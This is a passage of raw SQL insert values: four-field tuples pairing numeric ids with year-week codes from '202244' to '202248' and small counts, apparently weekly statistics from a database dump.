,(3752,1,'202244',3),(3771,1,'202244',3),(4341,1,'202244',3),(4396,1,'202244',3),(4400,1,'202244',3),(4404,1,'202244',3),(4428,1,'202244',3),(4517,1,'202244',3),(4542,1,'202244',3),(4546,1,'202244',3),(4645,1,'202244',3),(4657,1,'202244',3),(4677,1,'202244',3),(4681,1,'202244',3),(4685,1,'202244',3),(4750,1,'202244',3),(4753,1,'202244',3),(4768,1,'202244',3),(4802,1,'202244',3),(4870,1,'202244',3),(4878,1,'202244',3),(4888,1,'202244',3),(4893,1,'202244',3),(4897,1,'202244',3),(5037,1,'202244',3),(5050,1,'202244',3),(5054,1,'202244',3),(471,1,'202244',4),(476,1,'202244',4),(485,1,'202244',4),(1695,1,'202244',4),(1737,1,'202244',4),(1739,1,'202244',4),(2296,1,'202244',4),(2956,1,'202244',4),(2964,1,'202244',4),(3004,1,'202244',4),(3006,1,'202244',4),(3023,1,'202244',4),(3107,1,'202244',4),(3127,1,'202244',4),(3247,1,'202244',4),(3273,1,'202244',4),(3282,1,'202244',4),(3297,1,'202244',4),(3498,1,'202244',4),(3714,1,'202244',4),(3724,1,'202244',4),(3777,1,'202244',4),(4338,1,'202244',4),(4357,1,'202244',4),(4377,1,'202244',4),(4412,1,'202244',4),(4420,1,'202244',4),(4448,1,'202244',4),(4582,1,'202244',4),(4741,1,'202244',4),(4756,1,'202244',4),(4759,1,'202244',4),(5024,1,'202244',4),(5033,1,'202244',4),(5046,1,'202244',4),(5058,1,'202244',4),(5067,1,'202244',4),(5080,1,'202244',4),(5125,1,'202244',4),(5163,1,'202244',4),(102,1,'202244',5),(478,1,'202244',5),(479,1,'202244',5),(482,1,'202244',5),(488,1,'202244',5),(1584,1,'202244',5),(1745,1,'202244',5),(1774,1,'202244',5),(2309,1,'202244',5),(2609,1,'202244',5),(2751,1,'202244',5),(2911,1,'202244',5),(2965,1,'202244',5),(3005,1,'202244',5),(3038,1,'202244',5),(3041,1,'202244',5),(3087,1,'202244',5),(3102,1,'202244',5),(3104,1,'202244',5),(3124,1,'202244',5),(3287,1,'202244',5),(3313,1,'202244',5),(3482,1,'202244',5),(3489,1,'202244',5),(3742,1,'202244',5),(4332,1,'202244',5),(4444,1,'202244',5),(4454,1,'202244',5),(4520,1,'202244',5),(4556,1,'202244',5),(4651,1,'202244',5),(4654,1,'202244',5),(4694,1,'202244',5),(4747,1,'202244',5),(4776,1,'202244',5),(4980,1,'202244',5),(5157,1,'202244',5),(467,1,'202244',6),(469,1,'202244',6),(470,1,'202244',6),(472,1,'202244',6),(480,1,'202244',6),(481,1,'202244',6),(570,1,'202244',6),(1592,1,'202244',6),(1600,1,'202244',6),(2159,1,'202244',6),(2457,1,'202244',6),(2769,1,'202244',6),(2801,1,'202244',6),(2804,1,'202244',6),(3072,1,'202244',6),(3117,1,'202244',6),(3430,1,'202244',6),(3531,1,'202244',6),(3774,1,'202244',6),(4238,1,'202244',6),(4323,1,'202244',6),(4326,1,'202244',6),(4674,1,'202244',6),(4703,1,'202244',6),(4722,1,'202244',6),(4771,1,'202244',6),(5122,1,'202244',6),(5140,1,'202244',6),(5153,1,'202244',6),(84,1,'202244',7),(1604,1,'202244',7),(1614,1,'202244',7),(1724,1,'202244',7),(2809,1,'202244',7),(3710,1,'202244',7),(4529,1,'202244',7),(4762,1,'202244',7),(4977,1,'202244',7),(5071,1,'202244',7),(5146,1,'202244',7),(473,1,'202244',8),(474,1,'202244',8),(477,1,'202244',8),(486,1,'202244',8),(487,1,'202244',8),(1598,1,'202244',8),(3069,1,'202244',8),(3781,1,'202244',8),(4335,1,'202244',8),(4660,1,'202244',8),(4709,1,'202244',8),(4765,1,'202244',8),(4976,1,'202244',8),(4988,1,'202244',8),(87,1,'202244',9),(108,1,'202244',9),(468,1,'202244',9),(1594,1,'202244',9),(1602,1,'202244',9),(1606,1,'202244',9),(1608,1,'202244',9),(1722,1,'202244',9),(1728,1,'202244',9),(3083,1,'202244',9),(3764,1,'202244',9),(4416,1,'202244',9),(4524,1,'202244',9),(5076,1,'202244',9),(5128,1,'202244',9),(1596,1,'202244',10),(1610,1,'202244',10),(3030,1,'202244',10),(3060,1,'202244',10),(4457,1,'202244',10),(4700,1,'202244',10),(5101,1,'202244',10),(76,1,'202244',11),(335,1,'202244',11),(1588,1,'202244',11),(2503,1,'202244',11),(74,1,'202244',12),(4996,1,'202244',12),(5131,1,'202244',12),(1582,1,'202244',13),(1544,1,'202244',14),(1612,1,'202244',14),(4930,1,'202244',14),(5134,1,'202244',14),(5137,1,'202244',14),(5028,1,'202244',15),(5062,1,'202244',16),(89,1,'202244',18),(68,1,'202244',20),(72,1,'202244',20),(91,1,'202244',23),(2904,1,'202244',24),(1586,1,'202244',27),(80,1,'202244',85),(9,1,'202244',734),(106,1,'202245',1),(1707,1,'202245',1),(1711,1,'202245',1),(1715,1,'202245',1),(1739,1,'202245',1),(1782,1,'202245',1),(3247,1,'202245',1),(110,1,'202245',2),(478,1,'202245',2),(488,1,'202245',2),(1697,1,'202245',2),(1699,1,'202245',2),(1701,1,'202245',2),(1713,1,'202245',2),(1730,1,'202245',2),(1734,1,'202245',2),(1747,1,'202245',2),(1768,1,'202245',2),(2156,1,'202245',2),(2248,1,'202245',2),(3109,1,'202245',2),(3251,1,'202245',2),(3727,1,'202245',2),(4750,1,'202245',2),(4883,1,'202245',2),(476,1,'202245',3),(1703,1,'202245',3),(1709,1,'202245',3),(1772,1,'202245',3),(1774,1,'202245',3),(1776,1,'202245',3),(1778,1,'202245',3),(2063,1,'202245',3),(2252,1,'202245',3),(2293,1,'202245',3),(2964,1,'202245',3),(2993,1,'202245',3),(3038,1,'202245',3),(3104,1,'202245',3),(3229,1,'202245',3),(3261,1,'202245',3),(3267,1,'202245',3),(3307,1,'202245',3),(3498,1,'202245',3),(3714,1,'202245',3),(3735,1,'202245',3),(3752,1,'202245',3),(3774,1,'202245',3),(4377,1,'202245',3),(4404,1,'202245',3),(4408,1,'202245',3),(4444,1,'202245',3),(4448,1,'202245',3),(4888,1,'202245',3),(4980,1,'202245',3),(4988,1,'202245',3),(4996,1,'202245',3),(5020,1,'202245',3),(5024,1,'202245',3),(5050,1,'202245',3),(5140,1,'202245',3),(102,1,'202245',4),(480,1,'202245',4),(482,1,'202245',4),(1749,1,'202245',4),(1770,1,'202245',4),(1780,1,'202245',4),(2150,1,'202245',4),(2152,1,'202245',4),(2161,1,'202245',4),(2956,1,'202245',4),(2965,1,'202245',4),(2989,1,'202245',4),(3004,1,'202245',4),(3034,1,'202245',4),(3072,1,'202245',4),(3092,1,'202245',4),(3097,1,'202245',4),(3249,1,'202245',4),(3263,1,'202245',4),(3275,1,'202245',4),(3280,1,'202245',4),(3282,1,'202245',4),(3287,1,'202245',4),(3316,1,'202245',4),(3486,1,'202245',4),(3489,1,'202245',4),(3531,1,'202245',4),(3541,1,'202245',4),(3731,1,'202245',4),(3738,1,'202245',4),(3777,1,'202245',4),(4275,1,'202245',4),(4387,1,'202245',4),(4436,1,'202245',4),(4440,1,'202245',4),(4514,1,'202245',4),(4542,1,'202245',4),(4688,1,'202245',4),(4797,1,'202245',4),(4802,1,'202245',4),(4858,1,'202245',4),(4866,1,'202245',4),(4870,1,'202245',4),(4878,1,'202245',4),(4893,1,'202245',4),(4977,1,'202245',4),(5067,1,'202245',4),(481,1,'202245',5),(483,1,'202245',5),(486,1,'202245',5),(1584,1,'202245',5),(1720,1,'202245',5),(1728,1,'202245',5),(1741,1,'202245',5),(2148,1,'202245',5),(2154,1,'202245',5),(2159,1,'202245',5),(2178,1,'202245',5),(2296,1,'202245',5),(2558,1,'202245',5),(2617,1,'202245',5),(2748,1,'202245',5),(2775,1,'202245',5),(2801,1,'202245',5),(2991,1,'202245',5),(3006,1,'202245',5),(3041,1,'202245',5),(3079,1,'202245',5),(3087,1,'202245',5),(3096,1,'202245',5),(3124,1,'202245',5),(3257,1,'202245',5),(3259,1,'202245',5),(3273,1,'202245',5),(3297,1,'202245',5),(3430,1,'202245',5),(3534,1,'202245',5),(3721,1,'202245',5),(3742,1,'202245',5),(3749,1,'202245',5),(4335,1,'202245',5),(4357,1,'202245',5),(4363,1,'202245',5),(4368,1,'202245',5),(4396,1,'202245',5),(4424,1,'202245',5),(4432,1,'202245',5),(4517,1,'202245',5),(4546,1,'202245',5),(4556,1,'202245',5),(4566,1,'202245',5),(4582,1,'202245',5),(4591,1,'202245',5),(4668,1,'202245',5),(4681,1,'202245',5),(4741,1,'202245',5),(4756,1,'202245',5),(4765,1,'202245',5),(4768,1,'202245',5),(4792,1,'202245',5),(4862,1,'202245',5),(4874,1,'202245',5),(4897,1,'202245',5),(4976,1,'202245',5),(5037,1,'202245',5),(5054,1,'202245',5),(5080,1,'202245',5),(5122,1,'202245',5),(5128,1,'202245',5),(5146,1,'202245',5),(468,1,'202245',6),(469,1,'202245',6),(471,1,'202245',6),(474,1,'202245',6),(477,1,'202245',6),(479,1,'202245',6),(485,1,'202245',6),(1590,1,'202245',6),(1604,1,'202245',6),(1745,1,'202245',6),(1766,1,'202245',6),(2813,1,'202245',6),(3023,1,'202245',6),(3107,1,'202245',6),(3117,1,'202245',6),(3240,1,'202245',6),(3243,1,'202245',6),(3271,1,'202245',6),(3278,1,'202245',6),(3285,1,'202245',6),(3438,1,'202245',6),(4238,1,'202245',6),(4323,1,'202245',6),(4326,1,'202245',6),(4341,1,'202245',6),(4373,1,'202245',6),(4382,1,'202245',6),(4400,1,'202245',6),(4428,1,'202245',6),(4529,1,'202245',6),(4587,1,'202245',6),(4608,1,'202245',6),(4612,1,'202245',6),(4651,1,'202245',6),(4654,1,'202245',6),(4663,1,'202245',6),(4691,1,'202245',6),(4697,1,'202245',6),(4709,1,'202245',6),(4712,1,'202245',6),(4722,1,'202245',6),(4744,1,'202245',6),(4747,1,'202245',6),(4753,1,'202245',6),(4771,1,'202245',6),(4983,1,'202245',6),(5058,1,'202245',6),(5071,1,'202245',6),(5125,1,'202245',6),(5153,1,'202245',6),(467,1,'202245',7),(470,1,'202245',7),(484,1,'202245',7),(1592,1,'202245',7),(1718,1,'202245',7),(1743,1,'202245',7),(2297,1,'202245',7),(2457,1,'202245',7),(2609,1,'202245',7),(2751,1,'202245',7),(2769,1,'202245',7),(3045,1,'202245',7),(3090,1,'202245',7),(3245,1,'202245',7),(3724,1,'202245',7),(3746,1,'202245',7),(4329,1,'202245',7),(4332,1,'202245',7),(4391,1,'202245',7),(4420,1,'202245',7),(4454,1,'202245',7),(4648,1,'202245',7),(4657,1,'202245',7),(4660,1,'202245',7),(4694,1,'202245',7),(4703,1,'202245',7),(4759,1,'202245',7),(5028,1,'202245',7),(5033,1,'202245',7),(5042,1,'202245',7),(5101,1,'202245',7),(5137,1,'202245',7),(5157,1,'202245',7),(487,1,'202245',8),(1598,1,'202245',8),(1724,1,'202245',8),(1737,1,'202245',8),(1751,1,'202245',8),(2704,1,'202245',8),(2804,1,'202245',8),(2809,1,'202245',8),(3127,1,'202245',8),(3226,1,'202245',8),(3253,1,'202245',8),(3265,1,'202245',8),(3269,1,'202245',8),(3479,1,'202245',8),(4301,1,'202245',8),(4416,1,'202245',8),(4685,1,'202245',8),(4700,1,'202245',8),(5046,1,'202245',8),(5131,1,'202245',8),(335,1,'202245',9),(473,1,'202245',9),(1612,1,'202245',9),(2911,1,'202245',9),(3290,1,'202245',9),(3313,1,'202245',9),(3482,1,'202245',9),(3771,1,'202245',9),(4338,1,'202245',9),(4412,1,'202245',9),(4524,1,'202245',9),(4551,1,'202245',9),(4674,1,'202245',9),(4677,1,'202245',9),(5062,1,'202245',9),(5134,1,'202245',9),(87,1,'202245',10),(472,1,'202245',10),(1606,1,'202245',10),(1610,1,'202245',10),(1726,1,'202245',10),(2165,1,'202245',10),(3027,1,'202245',10),(3710,1,'202245',10),(5076,1,'202245',10),(74,1,'202245',11),(84,1,'202245',11),(108,1,'202245',11),(1596,1,'202245',11),(1608,1,'202245',11),(2658,1,'202245',11),(3063,1,'202245',11),(3069,1,'202245',11),(4645,1,'202245',11),(4930,1,'202245',11),(1614,1,'202245',12),(1722,1,'202245',12),(3066,1,'202245',12),(4776,1,'202245',12),(76,1,'202245',13),(91,1,'202245',13),(3083,1,'202245',13),(3781,1,'202245',13),(4520,1,'202245',13),(4762,1,'202245',13),(570,1,'202245',14),(2309,1,'202245',14),(2503,1,'202245',14),(3005,1,'202245',15),(4457,1,'202245',15),(1588,1,'202245',16),(1602,1,'202245',16),(3102,1,'202245',16),(3764,1,'202245',16),(4706,1,'202245',16),(72,1,'202245',17),(1594,1,'202245',17),(3030,1,'202245',18),(1582,1,'202245',19),(3060,1,'202245',20),(1600,1,'202245',21),(68,1,'202245',24),(89,1,'202245',24),(1586,1,'202245',24),(2904,1,'202245',24),(5163,1,'202245',24),(1544,1,'202245',30),(80,1,'202245',84),(9,1,'202245',690),(3245,1,'202246',1),(478,1,'202246',2),(2991,1,'202246',2),(3063,1,'202246',2),(4432,1,'202246',2),(4878,1,'202246',2),(106,1,'202246',3),(110,1,'202246',3),(480,1,'202246',3),(1720,1,'202246',3),(1782,1,'202246',3),(2293,1,'202246',3),(2704,1,'202246',3),(3004,1,'202246',3),(3041,1,'202246',3),(3079,1,'202246',3),(3096,1,'202246',3),(3097,1,'202246',3),(3226,1,'202246',3),(3229,1,'202246',3),(3243,1,'202246',3),(3316,1,'202246',3),(3486,1,'202246',3),(3749,1,'202246',3),(4408,1,'202246',3),(4648,1,'202246',3),(4651,1,'202246',3),(4883,1,'202246',3),(5042,1,'202246',3),(102,1,'202246',4),(471,1,'202246',4),(483,1,'202246',4),(485,1,'202246',4),(1590,1,'202246',4),(1592,1,'202246',4),(1695,1,'202246',4),(1705,1,'202246',4),(1709,1,'202246',4),(1732,1,'202246',4),(1739,1,'202246',4),(1741,1,'202246',4),(1749,1,'202246',4),(2150,1,'202246',4),(2296,1,'202246',4),(2748,1,'202246',4),(2769,1,'202246',4),(2989,1,'202246',4),(2993,1,'202246',4),(3045,1,'202246',4),(3072,1,'202246',4),(3090,1,'202246',4),(3247,1,'202246',4),(3249,1,'202246',4),(3257,1,'202246',4),(3269,1,'202246',4),(3271,1,'202246',4),(3280,1,'202246',4),(3282,1,'202246',4),(3297,1,'202246',4),(3482,1,'202246',4),(3541,1,'202246',4),(3710,1,'202246',4),(3724,1,'202246',4),(3738,1,'202246',4),(4275,1,'202246',4),(4301,1,'202246',4),(4368,1,'202246',4),(4382,1,'202246',4),(4400,1,'202246',4),(4517,1,'202246',4),(4542,1,'202246',4),(4546,1,'202246',4),(4591,1,'202246',4),(4741,1,'202246',4),(4744,1,'202246',4),(4750,1,'202246',4),(4762,1,'202246',4),(4768,1,'202246',4),(4792,1,'202246',4),(4802,1,'202246',4),(4858,1,'202246',4),(4888,1,'202246',4),(4897,1,'202246',4),(4983,1,'202246',4),(5028,1,'202246',4),(5033,1,'202246',4),(5046,1,'202246',4),(5067,1,'202246',4),(477,1,'202246',5),(479,1,'202246',5),(482,1,'202246',5),(484,1,'202246',5),(488,1,'202246',5),(1584,1,'202246',5),(1699,1,'202246',5),(1703,1,'202246',5),(1730,1,'202246',5),(1743,1,'202246',5),(1768,1,'202246',5),(1772,1,'202246',5),(1776,1,'202246',5),(1780,1,'202246',5),(2063,1,'202246',5),(2152,1,'202246',5),(2165,1,'202246',5),(2252,1,'202246',5),(2297,1,'202246',5),(2558,1,'202246',5),(2609,1,'202246',5),(2617,1,'202246',5),(2751,1,'202246',5),(2956,1,'202246',5),(2965,1,'202246',5),(3087,1,'202246',5),(3092,1,'202246',5),(3240,1,'202246',5),(3259,1,'202246',5),(3263,1,'202246',5),(3265,1,'202246',5),(3267,1,'202246',5),(3313,1,'202246',5),(3534,1,'202246',5),(3714,1,'202246',5),(3727,1,'202246',5),(3735,1,'202246',5),(3742,1,'202246',5),(3746,1,'202246',5),(3752,1,'202246',5),(3777,1,'202246',5),(4326,1,'202246',5),(4341,1,'202246',5),(4363,1,'202246',5),(4377,1,'202246',5),(4387,1,'202246',5),(4396,1,'202246',5),(4440,1,'202246',5),(4444,1,'202246',5),(4654,1,'202246',5),(4657,1,'202246',5),(4663,1,'202246',5),(4685,1,'202246',5),(4688,1,'202246',5),(4756,1,'202246',5),(4759,1,'202246',5),(4893,1,'202246',5),(4976,1,'202246',5),(4988,1,'202246',5),(5020,1,'202246',5),(5024,1,'202246',5),(5058,1,'202246',5),(5080,1,'202246',5),(5146,1,'202246',5),(5157,1,'202246',5),(467,1,'202246',6),(469,1,'202246',6),(473,1,'202246',6),(476,1,'202246',6),(486,1,'202246',6),(1614,1,'202246',6),(1697,1,'202246',6),(1707,1,'202246',6),(1715,1,'202246',6),(1726,1,'202246',6),(1734,1,'202246',6),(1751,1,'202246',6),(1774,1,'202246',6),(2156,1,'202246',6),(2159,1,'202246',6),(2309,1,'202246',6),(2911,1,'202246',6),(2964,1,'202246',6),(3023,1,'202246',6),(3027,1,'202246',6),(3038,1,'202246',6),(3066,1,'202246',6),(3107,1,'202246',6),(3251,1,'202246',6),(3253,1,'202246',6),(3273,1,'202246',6),(3275,1,'202246',6),(3278,1,'202246',6),(3285,1,'202246',6),(3287,1,'202246',6),(3721,1,'202246',6),(3771,1,'202246',6),(3774,1,'202246',6),(4329,1,'202246',6),(4373,1,'202246',6),(4448,1,'202246',6),(4566,1,'202246',6),(4582,1,'202246',6),(4608,1,'202246',6),(4681,1,'202246',6),(4747,1,'202246',6),(4753,1,'202246',6),(4776,1,'202246',6),(4866,1,'202246',6),(4870,1,'202246',6),(4980,1,'202246',6),(5037,1,'202246',6),(5050,1,'202246',6),(5054,1,'202246',6),(5122,1,'202246',6),(5125,1,'202246',6),(5140,1,'202246',6),(5153,1,'202246',6),(470,1,'202246',7),(1596,1,'202246',7),(1701,1,'202246',7),(1728,1,'202246',7),(1737,1,'202246',7),(1770,1,'202246',7),(1778,1,'202246',7),(2148,1,'202246',7),(2801,1,'202246',7),(2804,1,'202246',7),(2809,1,'202246',7),(3006,1,'202246',7),(3109,1,'202246',7),(3124,1,'202246',7),(3127,1,'202246',7),(3290,1,'202246',7),(3307,1,'202246',7),(3438,1,'202246',7),(3489,1,'202246',7),(3498,1,'202246',7),(3531,1,'202246',7),(3731,1,'202246',7),(4332,1,'202246',7),(4338,1,'202246',7),(4404,1,'202246',7),(4416,1,'202246',7),(4454,1,'202246',7),(4514,1,'202246',7),(4551,1,'202246',7),(4587,1,'202246',7),(4645,1,'202246',7),(4668,1,'202246',7),(4674,1,'202246',7),(4677,1,'202246',7),(4697,1,'202246',7),(4703,1,'202246',7),(4706,1,'202246',7),(4712,1,'202246',7),(4722,1,'202246',7),(4765,1,'202246',7),(4797,1,'202246',7),(4862,1,'202246',7),(4977,1,'202246',7),(4996,1,'202246',7),(5137,1,'202246',7),(74,1,'202246',8),(468,1,'202246',8),(474,1,'202246',8),(1713,1,'202246',8),(1724,1,'202246',8),(1747,1,'202246',8),(2161,1,'202246',8),(3034,1,'202246',8),(3117,1,'202246',8),(3261,1,'202246',8),(3479,1,'202246',8),(4238,1,'202246',8),(4357,1,'202246',8),(4424,1,'202246',8),(4428,1,'202246',8),(4436,1,'202246',8),(4556,1,'202246',8),(4660,1,'202246',8),(4694,1,'202246',8),(4700,1,'202246',8),(5101,1,'202246',8),(472,1,'202246',9),(487,1,'202246',9),(1600,1,'202246',9),(1745,1,'202246',9),(1766,1,'202246',9),(2178,1,'202246',9),(2248,1,'202246',9),(2775,1,'202246',9),(2813,1,'202246',9),(4524,1,'202246',9),(4612,1,'202246',9),(4691,1,'202246',9),(4771,1,'202246',9),(4874,1,'202246',9),(5071,1,'202246',9),(5131,1,'202246',9),(108,1,'202246',10),(481,1,'202246',10),(1604,1,'202246',10),(1711,1,'202246',10),(2154,1,'202246',10),(3069,1,'202246',10),(3083,1,'202246',10),(3430,1,'202246',10),(4323,1,'202246',10),(4391,1,'202246',10),(4457,1,'202246',10),(4520,1,'202246',10),(4529,1,'202246',10),(5134,1,'202246',10),(1606,1,'202246',11),(1612,1,'202246',11),(1718,1,'202246',11),(2503,1,'202246',11),(3104,1,'202246',11),(4412,1,'202246',11),(4420,1,'202246',11),(5062,1,'202246',11),(5128,1,'202246',11),(335,1,'202246',12),(1588,1,'202246',12),(1598,1,'202246',12),(2457,1,'202246',12),(4335,1,'202246',12),(5076,1,'202246',12),(3030,1,'202246',13),(3764,1,'202246',13),(4709,1,'202246',13),(570,1,'202246',14),(3102,1,'202246',14),(3781,1,'202246',14),(87,1,'202246',15),(4930,1,'202246',15),(2658,1,'202246',16),(3005,1,'202246',16),(1582,1,'202246',17),(1594,1,'202246',18),(1610,1,'202246',18),(1722,1,'202246',18),(1608,1,'202246',19),(3060,1,'202246',19),(68,1,'202246',21),(5163,1,'202246',21),(76,1,'202246',22),(84,1,'202246',22),(91,1,'202246',22),(89,1,'202246',24),(1544,1,'202246',24),(72,1,'202246',27),(1602,1,'202246',27),(1586,1,'202246',31),(2904,1,'202246',42),(80,1,'202246',59),(9,1,'202246',610),(1715,1,'202247',1),(1768,1,'202247',1),(1770,1,'202247',1),(1778,1,'202247',1),(2154,1,'202247',1),(2248,1,'202247',1),(2296,1,'202247',1),(2609,1,'202247',1),(2751,1,'202247',1),(2993,1,'202247',1),(3004,1,'202247',1),(3092,1,'202247',1),(3096,1,'202247',1),(3124,1,'202247',1),(3249,1,'202247',1),(3251,1,'202247',1),(3257,1,'202247',1),(3259,1,'202247',1),(3271,1,'202247',1),(3280,1,'202247',1),(3285,1,'202247',1),(3287,1,'202247',1),(3489,1,'202247',1),(3541,1,'202247',1),(3714,1,'202247',1),(3724,1,'202247',1),(3727,1,'202247',1),(3731,1,'202247',1),(3746,1,'202247',1),(4275,1,'202247',1),(4357,1,'202247',1),(4363,1,'202247',1),(4382,1,'202247',1),(4387,1,'202247',1),(4396,1,'202247',1),(4424,1,'202247',1),(4517,1,'202247',1),(4691,1,'202247',1),(4747,1,'202247',1),(4750,1,'202247',1),(4792,1,'202247',1),(4802,1,'202247',1),(5050,1,'202247',1),(102,1,'202247',2),(1730,1,'202247',2),(1747,1,'202247',2),(1766,1,'202247',2),(2156,1,'202247',2),(2161,1,'202247',2),(2293,1,'202247',2),(2558,1,'202247',2),(2775,1,'202247',2),(3041,1,'202247',2),(3045,1,'202247',2),(3079,1,'202247',2),(3087,1,'202247',2),(3107,1,'202247',2),(3117,1,'202247',2),(3226,1,'202247',2),(3253,1,'202247',2),(3267,1,'202247',2),(3269,1,'202247',2),(3275,1,'202247',2),(3282,1,'202247',2),(3486,1,'202247',2),(3531,1,'202247',2),(3749,1,'202247',2),(3752,1,'202247',2),(4332,1,'202247',2),(4377,1,'202247',2),(4432,1,'202247',2),(4440,1,'202247',2),(4529,1,'202247',2),(4546,1,'202247',2),(4566,1,'202247',2),(4648,1,'202247',2),(4651,1,'202247',2),(4657,1,'202247',2),(4663,1,'202247',2),(4674,1,'202247',2),(4681,1,'202247',2),(4685,1,'202247',2),(4700,1,'202247',2),(4706,1,'202247',2),(4756,1,'202247',2),(4765,1,'202247',2),(4797,1,'202247',2),(4862,1,'202247',2),(4870,1,'202247',2),(4874,1,'202247',2),(5028,1,'202247',2),(5062,1,'202247',2),(5067,1,'202247',2),(471,1,'202247',3),(480,1,'202247',3),(483,1,'202247',3),(1592,1,'202247',3),(1699,1,'202247',3),(1701,1,'202247',3),(1703,1,'202247',3),(1705,1,'202247',3),(1709,1,'202247',3),(1720,1,'202247',3),(1732,1,'202247',3),(1734,1,'202247',3),(1739,1,'202247',3),(1741,1,'202247',3),(1743,1,'202247',3),(1745,1,'202247',3),(1751,1,'202247',3),(1772,1,'202247',3),(1776,1,'202247',3),(2063,1,'202247',3),(2148,1,'202247',3),(2178,1,'202247',3),(2252,1,'202247',3),(2991,1,'202247',3),(3034,1,'202247',3),(3090,1,'202247',3),(3097,1,'202247',3),(3109,1,'202247',3),(3127,1,'202247',3),(3243,1,'202247',3),(3290,1,'202247',3),(3297,1,'202247',3),(3307,1,'202247',3),(3430,1,'202247',3),(3438,1,'202247',3),(3498,1,'202247',3),(3534,1,'202247',3),(3721,1,'202247',3),(3735,1,'202247',3),(3738,1,'202247',3),(3742,1,'202247',3),(3771,1,'202247',3),(4329,1,'202247',3),(4400,1,'202247',3),(4408,1,'202247',3),(4416,1,'202247',3),(4436,1,'202247',3),(4514,1,'202247',3),(4582,1,'202247',3),(4591,1,'202247',3),(4608,1,'202247',3),(4612,1,'202247',3),(4654,1,'202247',3),(4688,1,'202247',3),(4703,1,'202247',3),(4712,1,'202247',3),(4741,1,'202247',3),(4744,1,'202247',3),(4753,1,'202247',3),(4771,1,'202247',3),(4866,1,'202247',3),(4878,1,'202247',3),(4883,1,'202247',3),(4888,1,'202247',3),(4893,1,'202247',3),(4977,1,'202247',3),(4980,1,'202247',3),(5020,1,'202247',3),(5033,1,'202247',3),(5037,1,'202247',3),(5054,1,'202247',3),(5058,1,'202247',3),(110,1,'202247',4),(476,1,'202247',4),(481,1,'202247',4),(484,1,'202247',4),(488,1,'202247',4),(1695,1,'202247',4),(1697,1,'202247',4),(1718,1,'202247',4),(1749,1,'202247',4),(1780,1,'202247',4),(1782,1,'202247',4),(2150,1,'202247',4),(2152,1,'202247',4),(2159,1,'202247',4),(2457,1,'202247',4),(2704,1,'202247',4),(2748,1,'202247',4),(2769,1,'202247',4),(2964,1,'202247',4),(2989,1,'202247',4),(3006,1,'202247',4),(3027,1,'202247',4),(3072,1,'202247',4),(3104,1,'202247',4),(3229,1,'202247',4),(3240,1,'202247',4),(3247,1,'202247',4),(3261,1,'202247',4),(3273,1,'202247',4),(3278,1,'202247',4),(3313,1,'202247',4),(3316,1,'202247',4),(3479,1,'202247',4),(3710,1,'202247',4),(3777,1,'202247',4),(4238,1,'202247',4),(4341,1,'202247',4),(4368,1,'202247',4),(4391,1,'202247',4),(4404,1,'202247',4),(4448,1,'202247',4),(4556,1,'202247',4),(4587,1,'202247',4),(4660,1,'202247',4),(4709,1,'202247',4),(4722,1,'202247',4),(4759,1,'202247',4),(4762,1,'202247',4),(4768,1,'202247',4),(4776,1,'202247',4),(4858,1,'202247',4),(4976,1,'202247',4),(4983,1,'202247',4),(5024,1,'202247',4),(5042,1,'202247',4),(5046,1,'202247',4),(5080,1,'202247',4),(478,1,'202247',5),(482,1,'202247',5),(485,1,'202247',5),(486,1,'202247',5),(1614,1,'202247',5),(1707,1,'202247',5),(1713,1,'202247',5),(2165,1,'202247',5),(2297,1,'202247',5),(2617,1,'202247',5),(2801,1,'202247',5),(2813,1,'202247',5),(2965,1,'202247',5),(3023,1,'202247',5),(3066,1,'202247',5),(3245,1,'202247',5),(3263,1,'202247',5),(3482,1,'202247',5),(3774,1,'202247',5),(4420,1,'202247',5),(4454,1,'202247',5),(4524,1,'202247',5),(4542,1,'202247',5),(4551,1,'202247',5),(4697,1,'202247',5),(4988,1,'202247',5),(5140,1,'202247',5),(1584,1,'202247',6),(1598,1,'202247',6),(1608,1,'202247',6),(1711,1,'202247',6),(1724,1,'202247',6),(1737,1,'202247',6),(1774,1,'202247',6),(2804,1,'202247',6),(3063,1,'202247',6),(3069,1,'202247',6),(3265,1,'202247',6),(4301,1,'202247',6),(4326,1,'202247',6),(4335,1,'202247',6),(4668,1,'202247',6),(4694,1,'202247',6),(4897,1,'202247',6),(4996,1,'202247',6),(5101,1,'202247',6),(5125,1,'202247',6),(472,1,'202247',7),(477,1,'202247',7),(1590,1,'202247',7),(1604,1,'202247',7),(2658,1,'202247',7),(2956,1,'202247',7),(3005,1,'202247',7),(3102,1,'202247',7),(4323,1,'202247',7),(4338,1,'202247',7),(4444,1,'202247',7),(4645,1,'202247',7),(5071,1,'202247',7),(5122,1,'202247',7),(467,1,'202247',8),(479,1,'202247',8),(570,1,'202247',8),(1606,1,'202247',8),(1726,1,'202247',8),(1728,1,'202247',8),(4412,1,'202247',8),(4520,1,'202247',8),(4677,1,'202247',8),(5076,1,'202247',8),(5153,1,'202247',8),(5157,1,'202247',8),(473,1,'202247',9),(474,1,'202247',9),(1612,1,'202247',9),(3060,1,'202247',9),(3083,1,'202247',9),(4428,1,'202247',9),(5131,1,'202247',9),(5146,1,'202247',9),(74,1,'202247',10),(87,1,'202247',10),(1596,1,'202247',10),(1722,1,'202247',10),(2911,1,'202247',10),(3030,1,'202247',10),(5128,1,'202247',10),(108,1,'202247',11),(335,1,'202247',11),(468,1,'202247',11),(487,1,'202247',11),(1588,1,'202247',11),(2809,1,'202247',11),(84,1,'202247',12),(2309,1,'202247',12),(3764,1,'202247',12),(3781,1,'202247',12),(4930,1,'202247',12),(469,1,'202247',13),(1594,1,'202247',13),(1602,1,'202247',13),(1610,1,'202247',13),(4457,1,'202247',13),(470,1,'202247',14),(5134,1,'202247',14),(5163,1,'202247',14),(1582,1,'202247',15),(2503,1,'202247',15),(72,1,'202247',16),(5137,1,'202247',16),(76,1,'202247',17),(91,1,'202247',17),(1600,1,'202247',17),(68,1,'202247',20),(2904,1,'202247',21),(1544,1,'202247',22),(89,1,'202247',23),(1586,1,'202247',27),(80,1,'202247',75),(9,1,'202247',584),(1695,1,'202248',1),(1699,1,'202248',1),(1701,1,'202248',1),(1730,1,'202248',1),(1749,1,'202248',1),(1772,1,'202248',1),(2148,1,'202248',1),(2150,1,'202248',1),(2248,1,'202248',1),(3109,1,'202248',1),(3127,1,'202248',1),(3243,1,'202248',1),(3249,1,'202248',1),(3280,1,'202248',1),(3731,1,'202248',1),(3749,1,'202248',1),(4357,1,'202248',1),(4377,1,'202248',1),(4424,1,'202248',1),(4546,1,'202248',1),(4668,1,'202248',1),(4858,1,'202248',1),(4866,1,'202248',1),(106,1,'202248',2),(485,1,'202248',2),(1697,1,'202248',2),(1705,1,'202248',2),